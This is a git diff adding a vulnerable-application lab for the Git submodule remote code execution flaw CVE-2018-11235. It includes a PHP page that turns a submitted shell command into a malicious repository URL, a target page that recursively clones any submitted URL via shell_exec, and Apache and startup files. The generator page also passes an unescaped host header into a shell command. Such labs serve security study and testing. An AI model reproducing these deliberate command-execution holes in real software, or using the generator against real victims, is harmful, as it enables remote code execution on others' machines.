+        <textarea id="command"  name="command" placeholder="#!/bin/sh
+id > /tmp/vuln" style="width: 400px;height: 100px; margin-bottom: 10px;margin-top: 10px;">#!/bin/sh
+id > /tmp/vuln</textarea><br/>
+        <input type="submit" value="生成Exp" />
+    </form>
+    <a href="./repos/">查看已有仓库</a><br/>
+
+<?php
+    if (strpos($_SERVER['HTTP_HOST'], "127.0.0.1") !== false) {
+        die("<br>请不要使用 127.0.0.1 这个地址来访问此页面");
+    }
+
+    if (isset($_REQUEST['command']) && !empty($_REQUEST['command'])) {
+        $command = str_replace("\r\n", "\n", $_REQUEST['command']);
+        file_put_contents("/tmp/evil.sh", $command);
+        // @chdir("/var/www/html/repos/");
+        $str="QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm";
+        str_shuffle($str);
+        $repo_name=substr(str_shuffle($str),26,10);
+
+        shell_exec("/bin/sh /var/www/html/build.sh ".$repo_name." ".$_SERVER['HTTP_HOST']);
+        
+        $expurl=$_SERVER['REQUEST_SCHEME']."://".$_SERVER['HTTP_HOST']."/git/".$repo_name;
+        echo "生成Exp成功:<br/>";
+        echo "Exp URL: ".$expurl."<br/>";
+        echo "如果你想在自己机器上测试,执行: <br/>";
+        echo "git clone --recurse ".$expurl;
+    }
+?>
+ </body>
+</html>
diff --git a/g/git/1/exp/src/start.sh b/g/git/1/exp/src/start.sh
new file mode 100644
index 0000000..3f737e7
--- /dev/null
+++ b/g/git/1/exp/src/start.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+/etc/init.d/apache2 restart
+/usr/bin/tail -f /dev/null
diff --git a/g/git/1/src/apache2.conf b/g/git/1/src/apache2.conf
new file mode 100644
index 0000000..1576d89
--- /dev/null
+++ b/g/git/1/src/apache2.conf
@@ -0,0 +1,228 @@
+# This is the main Apache server configuration file.  It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+#	/etc/apache2/
+#	|-- apache2.conf
+#	|	`--  ports.conf
+#	|-- mods-enabled
+#	|	|-- *.load
+#	|	`-- *.conf
+#	|-- conf-enabled
+#	|	`-- *.conf
+# 	`-- sites-enabled
+#	 	`-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+#   together by including all remaining configuration files when starting up the
+#   web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+#   supposed to determine listening ports for incoming connections which can be
+#   customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+#   directories contain particular configuration snippets which manage modules,
+#   global configuration fragments, or virtual host configurations,
+#   respectively.
+#
+#   They are activated by symlinking available configuration files from their
+#   respective *-available/ counterparts. These should be managed by using our
+#   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+#   their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+#   the default configuration, apache2 needs to be started/stopped with
+#   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+#   work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE!  If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a <VirtualHost>
+# container, error messages relating to that virtual host will be
+# logged here.  If you *do* define an error logfile for a <VirtualHost>
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+<Directory />
+	Options FollowSymLinks
+	AllowOverride None
+	Require all denied
+</Directory>
+
+<Directory /usr/share>
+	AllowOverride None
+	Require all granted
+</Directory>
+
+<Directory /var/www/>
+	Options Indexes FollowSymLinks
+	AllowOverride None
+	Require all granted
+</Directory>
+
+#<Directory /srv/>
+#	Options Indexes FollowSymLinks
+#	AllowOverride None
+#	Require all granted
+#</Directory>
+<Directory "/var/www/html/repos">
+    Options Indexes FollowSymLinks
+    <FilesMatch "\.(?i:php|php3|php4|php5)$">
+	SetHandler application/x-httpd-php-source
+    	Order Deny,Allow
+    	Allow from all
+    </FilesMatch>
+</Directory>
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives.  See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+<FilesMatch "^\.ht">
+	Require all denied
+</FilesMatch>
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
diff --git a/g/git/1/src/index.php b/g/git/1/src/index.php
new file mode 100644
index 0000000..bb7720d
--- /dev/null
+++ b/g/git/1/src/index.php
@@ -0,0 +1,23 @@
+<html>
+ <head>
+  <meta charset="utf-8">
+  <title>Repository Clone</title>
+ </head>
+ <body>
+    <p>CVE-2018-11235 Vuln Demo</p>
+    <form method="post">
+        <label for="repourl">Repository’s clone URL</label><br>
+        <input id="repourl" type="input" name="repourl" placeholder="https://github.com/VulApps/CVE-2018-11235.git" style="width: 400px;height: 30px;margin-bottom: 10px;margin-top: 10px;"><br/>
+        <input type="submit" value="Submit" />
+    </form>
+    <p>注意:GitHub 和微软（通过 Visual Studio Team Services）的 Git 托管服务已经部署了这些补丁，clone 的 URL 可以使用自己的服务器。</p>
+<?php 
+    if (isset($_REQUEST['repourl']) && !empty($_REQUEST['repourl'])) {
+        $repourl = escapeshellarg($_REQUEST['repourl']);
+        @chdir("/var/www/html/repos/");
+        shell_exec("git clone --recursive $repourl");
+        echo 'See your project at: <a href="/repos">Repos</a>';
+    }
+?>
+ </body>
+</html>
diff --git a/g/git/1/src/start.sh b/g/git/1/src/start.sh
new file mode 100644
index 0000000..3f737e7
--- /dev/null
+++ b/g/git/1/src/start.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+/etc/init.d/apache2 restart
+/usr/bin/tail -f /dev/null
diff --git a/g/git/README.md b/g/git/README.md
new file mode 100644
index 0000000..27f9981
--- /dev/null
+++ b/g/git/README.md
@@ -0,0 +1,4 @@
+Git
+---
+
+1. [Git远程代码执行漏洞(CVE-2018-11235)](./1/)